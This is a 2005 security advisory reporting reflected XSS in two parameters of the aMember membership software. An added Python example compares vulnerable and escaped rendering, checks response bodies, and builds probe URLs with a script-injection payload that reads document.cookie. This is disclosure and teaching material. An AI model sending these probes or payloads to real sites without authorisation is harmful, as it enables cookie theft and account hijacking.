------------------------------------------------------
Nightmare TeAmZ Advisory 014
------------------------------------------------------

Date - 11/2005

aMember XSS

AFFECTED PRODUCTS
=================
aMember
http://www.amember.com

OVERVIEW
========
aMember is flexible membership software with full-featured subscription management. It supports PayPal, 2Checkout, ccBill, AllRepay, Clickbank, Authorize.net, WorldPay, LinkPoint, NoChex and other payment systems (50+ payment systems currently supported), and lets you set up paid-membership areas on your site. It can also be used without any payment system, with users managed manually. It allows you to create different subscription types with different prices, periods and access permissions, and integrates with phpNuke, vBulletin, InvisionBoard and other scripts.

Vulnerable Path (XSS):
======================
/sendpass.php?lamember_login=">[XSS]
/member.php?login=[XSS]

Both parameters are reflected into the response without HTML encoding. The leading "> in the sendpass.php case closes the quoted attribute and tag the value lands in before the injected markup is rendered.

Solution:
=========
1. Vendor not contacted

Credits
=======
This vulnerability was discovered and researched by BiPi_HaCk of Nightmare TeAmZ

We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0
Site: http://www.NightmareSecurity.net <-- IT Security Forum
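The following is an added example, not part of the advisory and not aMember's code. It models the reflected-XSS pattern the advisory describes: a login name from the query string written straight into an <input value="..."> attribute. The template, the hypothetical host name target.example and the alert() body are constructed for illustration; the paths and parameter names are copied from the advisory as listed. It shows the vulnerable rendering beside the fixed one, a check that tells the two apart in a response body, and how the two probe URLs are built.

```python
"""Reflected XSS via an unencoded attribute value: vulnerable vs. fixed rendering."""
import html
from urllib.parse import urlencode

# Constructed model of the bug: a login name is interpolated into a quoted
# attribute. Hypothetical template; not aMember's real sendpass.php/member.php.
FORM_TEMPLATE = (
    '<form method="post" action="/sendpass.php">'
    '<input type="text" name="amember_login" value="{login}">'
    '</form>'
)

# Payload shape from the advisory: "> closes the value attribute and the
# <input> tag, then arbitrary markup follows. The script body is a placeholder.
PAYLOAD = '"><script>alert(document.cookie)</script>'

# Paths and parameter names exactly as the advisory lists them.
VULNERABLE_PATHS = {
    "/sendpass.php": "lamember_login",
    "/member.php": "login",
}


def render_vulnerable(login: str) -> str:
    """Reflect the parameter verbatim into the attribute (the bug)."""
    return FORM_TEMPLATE.format(login=login)


def render_fixed(login: str) -> str:
    """Reflect the parameter after encoding it for an HTML attribute context.

    quote=True turns both " and ' into entities, so the injected value can
    no longer close the attribute it is placed in.
    """
    return FORM_TEMPLATE.format(login=html.escape(login, quote=True))


def reflects_unescaped(body: str, payload: str) -> bool:
    """Response-body check: does the payload come back byte-for-byte?

    True means the attribute breakout works. If only the entity-encoded form
    appears, the value is inert and this returns False.
    """
    return payload in body


def probe_urls(base_url: str, payload: str = PAYLOAD) -> list:
    """Build the two test URLs from the advisory with the payload URL-encoded."""
    return [
        f"{base_url}{path}?{urlencode({param: payload})}"
        for path, param in VULNERABLE_PATHS.items()
    ]


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        body = render(PAYLOAD)
        print(f"{label}: reflected unescaped = {reflects_unescaped(body, PAYLOAD)}")
        print("    " + body)
    for url in probe_urls("http://target.example"):
        print(url)
```

Running the script prints the vulnerable page with a live <script> element and the fixed page with `&quot;&gt;&lt;script&gt;...` sitting harmlessly inside the attribute. When testing a real instance, submit the probe URLs and feed each response to reflects_unescaped(); a True result is the condition the advisory reports.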